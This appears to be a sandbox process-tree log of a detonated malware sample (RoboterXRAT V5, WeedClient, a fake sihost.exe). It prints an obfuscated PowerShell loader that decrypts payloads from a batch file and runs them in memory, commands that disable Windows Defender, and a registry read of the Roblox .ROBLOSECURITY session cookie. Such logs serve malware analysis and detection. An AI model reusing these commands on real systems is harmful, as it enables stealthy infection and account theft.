        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        53⤵
        
        PID:6812
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        53⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6992
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        50⤵
        
        PID:4804
        
        C:\Windows\system32\net.exe
        
        net file
        51⤵
        
        PID:3388
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        52⤵
        
        PID:1500
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        50⤵
        
        PID:6416
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        51⤵
        
        PID:5836
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        51⤵
        
        PID:7108
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        51⤵
        
        PID:1448
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        49⤵
        
        PID:4056
        
        C:\Windows\system32\net.exe
        
        net file
        50⤵
        
        PID:3396
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        51⤵
        
        PID:6060
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        50⤵
        
        PID:5328
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        49⤵
        
        PID:6080
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        48⤵
        
        PID:7100
        
        C:\Windows\system32\net.exe
        
        net file
        49⤵
        
        PID:708
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        50⤵
        
        PID:5576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        49⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7032
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        48⤵
        
        PID:1420
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        49⤵
        
        PID:4084
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        50⤵
        
        PID:4116
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        50⤵
        
        PID:1764
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        50⤵
        
        PID:6124
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        49⤵
        
        PID:7068
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        49⤵
        
        PID:5704
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        47⤵
        
        PID:5476
        
        C:\Windows\system32\net.exe
        
        net file
        48⤵
        
        PID:1448
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        49⤵
        
        PID:1128
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        48⤵
        
        PID:7144
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        47⤵
        
        PID:3376
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        46⤵
        
        PID:6852
        
        C:\Windows\system32\net.exe
        
        net file
        47⤵
        
        PID:5360
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        48⤵
        
        PID:5632
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        47⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5060
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        46⤵
        
        PID:5212
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        45⤵
        
        PID:2272
        
        C:\Windows\system32\net.exe
        
        net file
        46⤵
        
        PID:7092
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        47⤵
        
        PID:6616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        46⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3308
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        45⤵
        
        PID:6204
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        44⤵
        
        PID:6688
        
        C:\Windows\system32\net.exe
        
        net file
        45⤵
        
        PID:1676
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        46⤵
        
        PID:6576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1096
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        44⤵
        
        PID:6572
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        45⤵
        
        PID:5328
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        46⤵
        
        PID:6464
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        47⤵
        
        PID:6488
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        48⤵
        
        PID:4164
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        49⤵
        
        PID:2444
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        50⤵
        
        PID:5672
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        50⤵
        
        PID:2996
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        50⤵
        
        PID:4072
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        49⤵
        
        PID:4712
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        49⤵
        
        PID:4728
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        48⤵
        
        PID:6416
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        48⤵
        
        PID:6880
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        47⤵
        
        PID:3548
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        47⤵
        
        PID:744
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        48⤵
        
        PID:6812
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        48⤵
        Views/modifies file attributes
        
        PID:5656
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        48⤵
        
        PID:6080
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        48⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6076
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        48⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6624
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        48⤵
        
        PID:5528
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        48⤵
        
        PID:6628
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        48⤵
        
        PID:7036
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        48⤵
        
        PID:3584
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        48⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4876
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        48⤵
        Detects videocard installed
        
        PID:3828
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        48⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:6332
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        49⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3692
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        46⤵
        
        PID:5676
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        46⤵
        
        PID:5696
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        45⤵
        
        PID:5512
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        45⤵
        
        PID:6712
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        43⤵
        
        PID:5704
        
        C:\Windows\system32\net.exe
        
        net file
        44⤵
        
        PID:6960
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        45⤵
        
        PID:532
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        43⤵
        
        PID:6968
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        44⤵
        
        PID:5060
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        44⤵
        
        PID:6836
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        44⤵
        
        PID:7032
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        42⤵
        
        PID:6840
        
        C:\Windows\system32\net.exe
        
        net file
        43⤵
        
        PID:2092
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        44⤵
        
        PID:5520
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        43⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5672
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        42⤵
        
        PID:1692
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        43⤵
        
        PID:5856
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        43⤵
        
        PID:5680
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        43⤵
        
        PID:1908
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        41⤵
        
        PID:6640
